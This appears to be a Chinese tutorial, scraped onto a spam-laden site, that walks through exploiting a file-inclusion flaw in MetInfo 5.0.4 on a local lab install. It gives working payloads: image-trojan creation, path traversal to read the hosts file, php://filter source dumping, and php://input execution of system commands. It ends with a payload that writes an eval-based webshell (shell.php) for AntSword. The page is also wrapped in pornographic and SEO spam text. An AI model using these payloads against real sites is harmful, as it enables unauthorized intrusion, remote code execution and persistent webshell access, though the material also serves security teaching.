中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁 > news >正文

桃花島網(wǎng)站是什么網(wǎng)站優(yōu)化排名公司

桃花島網(wǎng)站是什么,網(wǎng)站優(yōu)化排名公司,邢臺網(wǎng)站推廣怎么做,騰訊云wed服務(wù)器做網(wǎng)站感謝互聯(lián)網(wǎng)提供分享知識與智慧,在法治的社會里,請遵守有關(guān)法律法規(guī) 文章目錄 1、蟻劍直接連接圖片馬2、讀取敏感目錄3、讀取php源碼4、執(zhí)行PHP命令5、包含木馬寫Shell (圖片馬制作新方法) 以 metinfo_5.0.4為例 該環(huán)境的文件上傳…

感謝互聯(lián)網(wǎng)提供分享知識與智慧,在法治的社會里,請遵守有關(guān)法律法規(guī)

文章目錄

          • 1、蟻劍直接連接圖片馬
          • 2、讀取敏感目錄
          • 3、讀取php源碼
          • 4、執(zhí)行PHP命令
          • 5、包含木馬寫Shell (圖片馬制作新方法)

以 metinfo_5.0.4為例

該環(huán)境的文件上傳點在admin路徑下

在這里插入圖片描述

但是上傳文件會失敗,

所以直接在網(wǎng)站的upload\file下放入圖片木馬


文件包含漏洞利用點:/about/index.php?fmodule=7&module=[filePath]

1、蟻劍直接連接圖片馬

圖片馬制作:

copy 1.jpg/b+1.php/a 22.jpg

上傳圖片木馬,通過文件包含的方式去訪問

http://127.0.0.1/MetInfo5.0.4//about/index.php?fmodule=7&module=../upload/file/22.jpg

在這里插入圖片描述

使用蟻劍連接

在這里插入圖片描述

在這里插入圖片描述

2、讀取敏感目錄
http://127.0.0.1/MetInfo5.0.4//about/index.php?fmodule=7&module=../../../../../../../../../../../windows/system32/drivers/etc/hosts

在這里插入圖片描述

3、讀取php源碼
http://127.0.0.1/MetInfo5.0.4/about/index.php?fmodule=7&module=php://filter/read=convert.base64-encode/resource=show.php

在這里插入圖片描述

讀取結(jié)果:

PD9waHANCiMgTWV0SW5mbyBFbnRlcnByaXNlIENvbnRlbnQgTWFuYWdlbWVudCBTeXN0ZW0gDQojIENvcHlyaWdodCAoQykgTWV0SW5mbyBDby4sTHRkIChodHRwOi8vd3d3Lm1ldGluZm8uY24pLiBBbGwgcmlnaHRzIHJlc2VydmVkLiANCnJlcXVpcmVfb25jZSAnLi4vaW5jbHVkZS9jb21tb24uaW5jLnBocCc7DQppZighJGlkICYmICRjbGFzczEpJGlkID0gJGNsYXNzMTsNCiRzaG93ID0gJGRiLT5nZXRfb25lKCJTRUxFQ1QgKiBGUk9NICRtZXRfY29sdW1uIFdIRVJFIGlkPSRpZCBhbmQgbW9kdWxlPTEiKTsNCmlmKCEkc2hvd3x8ISRzaG93Wydpc3Nob3cnXSl7DQpva2luZm8oJy4uLzQwNC5odG1sJyk7DQp9DQokbWV0YWNjZXNzPSRzaG93W2FjY2Vzc107DQppZigkc2hvd1tjbGFzc3R5cGVdPT0zKXsNCiRzaG93MyA9ICRkYi0+Z2V0X29uZSgiU0VMRUNUICogRlJPTSAkbWV0X2NvbHVtbiBXSEVSRSBpZD0nJHNob3dbYmlnY2xhc3NdJyIpOw0KJGNsYXNzMT0kc2hvdzNbYmlnY2xhc3NdOw0KJGNsYXNzMj0kc2hvd1tiaWdjbGFzc107DQokY2xhc3MzPSRzaG93W2lkXTsNCn1lbHNlew0KJGNsYXNzMT0kc2hvd1tiaWdjbGFzc10/JHNob3dbYmlnY2xhc3NdOiRpZDsNCiRjbGFzczI9JHNob3dbYmlnY2xhc3NdPyRpZDoiMCI7DQokY2xhc3MzPTA7DQp9DQoNCnJlcXVpcmVfb25jZSAnLi4vaW5jbHVkZS9oZWFkLnBocCc7DQokY2xhc3MxX2luZm89JGNsYXNzX2xpc3RbJGNsYXNzMV07DQokY2xhc3MxX2xpc3Q9JGNsYXNzMV9pbmZvOw0KJGNsYXNzMl9pbmZvPSRjbGFzc19saXN0WyRjbGFzczJdOw0KJGNsYXNzM19pbmZvPSRjbGFzc19saXN0WyRjbGFzczNdOw0KJHNob3dbY29udGVudF09Y29udGVudHNob3coJzxkaXY+Jy4kc2hvd1tjb250ZW50XS4nPC9kaXY+Jyk7DQokc2hvd1tkZXNjcmlwdGlvbl09JHNob3dbZGVzY3JpcHRpb25dPyRzaG93W2Rlc2NyaXB0aW9uXTokbWV0X2tleXdvcmRzOw0KJHNob3dba2V5d29yZHNdPSRzaG93W2tleXdvcmRzXT8kc2hvd1trZXl3b3Jkc106JG1ldF9rZXl3b3JkczsNCiRtZXRfdGl0bGU9JG1ldF90aXRsZT8kc2hvd1snbmFtZSddLictJy4kbWV0X3RpdGxlOiRzaG93WyduYW1lJ107DQppZigkc2hvd1snY3RpdGxlJ10hPScnKSRtZXRfdGl0bGU9JHNob3dbJ2N0aXRsZSddOw0KcmVxdWlyZV9vbmNlICcuLi9wdWJsaWMvcGhwL21ldGh0bWwuaW5jLnBocCc7DQppbmNsdWRlIHRlbXBsYXRlKCdzaG93Jyk7DQpmb290ZXIoKTsNCiMgVGhpcyBwcm9ncmFtIGlzIGFuIG9wZW4gc291cmNlIHN5c3RlbSwgY29tbWVyY2lhbCB1c2UsIHBsZWFzZSBjb25zY2lvdXNseSB0byBwdXJjaGFzZSBjb21tZXJjaWFsIGxpY2Vuc2UuDQojIENvcHlyaWdodCAoQykgTWV0SW5mbyBDby4sIEx0ZC4gKGh0dHA6Ly93d3cubWV0aW5mby5jbikuIEFsbCByaWdodHMgcmVzZXJ2ZWQuDQo/

得出base64編碼格式的數(shù)據(jù),使用bp的Decoder功能進行base64解碼

在這里插入圖片描述

也可以利用HackBar瀏覽器插件

在這里插入圖片描述

復(fù)制得到的base64編碼格式的php代碼

在這里插入圖片描述

點擊 OK

在這里插入圖片描述

解碼成功!

4、執(zhí)行PHP命令

bp攔截得到php源碼的數(shù)據(jù)包

在這里插入圖片描述

發(fā)送到Repeater模塊

GET包該成POST數(shù)據(jù)包

在這里插入圖片描述

得到POST數(shù)據(jù)包

在這里插入圖片描述

把POST請求體中的變量放到url中提交

雖然說是POST數(shù)據(jù)包,但是POST數(shù)據(jù)包的url中也可以用GET參數(shù)

在這里插入圖片描述

fmodule=7&module=的值改成php://input,然后在下面寫入php代碼,點擊send

<?php phpinfo();?>

在這里插入圖片描述

執(zhí)行系統(tǒng)代碼

<?php 
system("whoami")
?>

在這里插入圖片描述

<?php 
system("ipconfig")
?>

在這里插入圖片描述

5、包含木馬寫Shell (圖片馬制作新方法)
<?php fputs(fopen("shell.php",'w'),'<?=@eval($_REQUEST[777]);phpinfo();?>')?>

該段代碼的含義是,在當(dāng)前目錄下創(chuàng)建一個名為shell.php的文件,內(nèi)容為<?php phpinfo();?>,當(dāng)我們直接包含圖片的時候,這段代碼就會被執(zhí)行

重新再upload\file下放入一張沒有木馬的圖片,使用另一種方式制作圖片木馬

點擊圖片---右鍵屬性---詳細信息

在這里插入圖片描述

點擊應(yīng)用,點擊確定

在瀏覽器中訪問圖片http://127.0.0.1/MetInfo5.0.4/upload/file/1.jpg,圖片正常顯示

在這里插入圖片描述

使用文件包含的方式去訪問圖片

http://127.0.0.1/MetInfo5.0.4/about/index.php?fmodule=7&module=../upload/file/1.jpg

頁面顯示如下:

在這里插入圖片描述

隨即發(fā)現(xiàn)在upload文件夾中有個新建文件shell.php,即可用蟻劍連接

在這里插入圖片描述

拿到webshell
在這里插入圖片描述

http://www.risenshineclean.com/news/60195.html

相關(guān)文章:

  • 建設(shè)服裝網(wǎng)站的意義營業(yè)推廣促銷方式有哪些
  • 濟南網(wǎng)站優(yōu)化技術(shù)廠家全球疫情最新數(shù)據(jù)
  • 網(wǎng)站建設(shè)百度優(yōu)化軟文推廣營銷
  • 做網(wǎng)站選擇系統(tǒng)愛上鏈外鏈購買交易
  • 云南網(wǎng)站開發(fā)網(wǎng)絡(luò)公司前10最新足球消息
  • 日照手機網(wǎng)站建設(shè)2022最好的百度seo
  • 怎樣給一個網(wǎng)站做專題策劃谷歌seo網(wǎng)站建設(shè)
  • 高端網(wǎng)站開發(fā)找哪家好百度seo多少錢一個月
  • vue wordpress 主題seo排名優(yōu)化軟件有
  • 手機網(wǎng)站建設(shè)軟件營銷型網(wǎng)站重要特點是
  • 做惡搞圖片的網(wǎng)站海外推廣專員
  • 網(wǎng)站建設(shè)英文合同淘寶seo軟件
  • 湛江搜索引擎網(wǎng)站推廣品牌營銷策略
  • 有些網(wǎng)站突然無法訪問寧波優(yōu)化系統(tǒng)
  • 溫州大都市建設(shè)開發(fā)有限公司網(wǎng)站seo試用軟件
  • 軟裝設(shè)計素材網(wǎng)站seo網(wǎng)站排名優(yōu)化公司
  • 湖南做網(wǎng)站kaodezhu被國家禁止訪問的網(wǎng)站怎么打開
  • 網(wǎng)站備案查詢不到說明啥短網(wǎng)址生成網(wǎng)站
  • 株洲市區(qū)網(wǎng)站建設(shè)公司長春網(wǎng)站建設(shè)方案推廣
  • 做徽標(biāo)的網(wǎng)站網(wǎng)絡(luò)營銷課程心得體會
  • 一級a做片性視頻網(wǎng)站鄭州百度seo網(wǎng)站優(yōu)化
  • 中山企業(yè)建站程序三只松鼠軟文范例500字
  • 智趣游戲型網(wǎng)站開發(fā)百度收錄批量查詢工具
  • 和諧校園網(wǎng)站建設(shè)企業(yè)整站seo
  • 怎樣購買網(wǎng)站程序360公司官網(wǎng)首頁
  • 汕頭好的建站網(wǎng)站杭州疫情最新消息
  • 裝修設(shè)計網(wǎng)站源碼三只松鼠的軟文范例
  • wordpress整站隱藏百度一下手機版
  • 馬云將來淘汰的十個行業(yè)網(wǎng)站建設(shè)跨境電商哪個平臺比較好
  • 哪家網(wǎng)站建設(shè)做的好百度賬號個人中心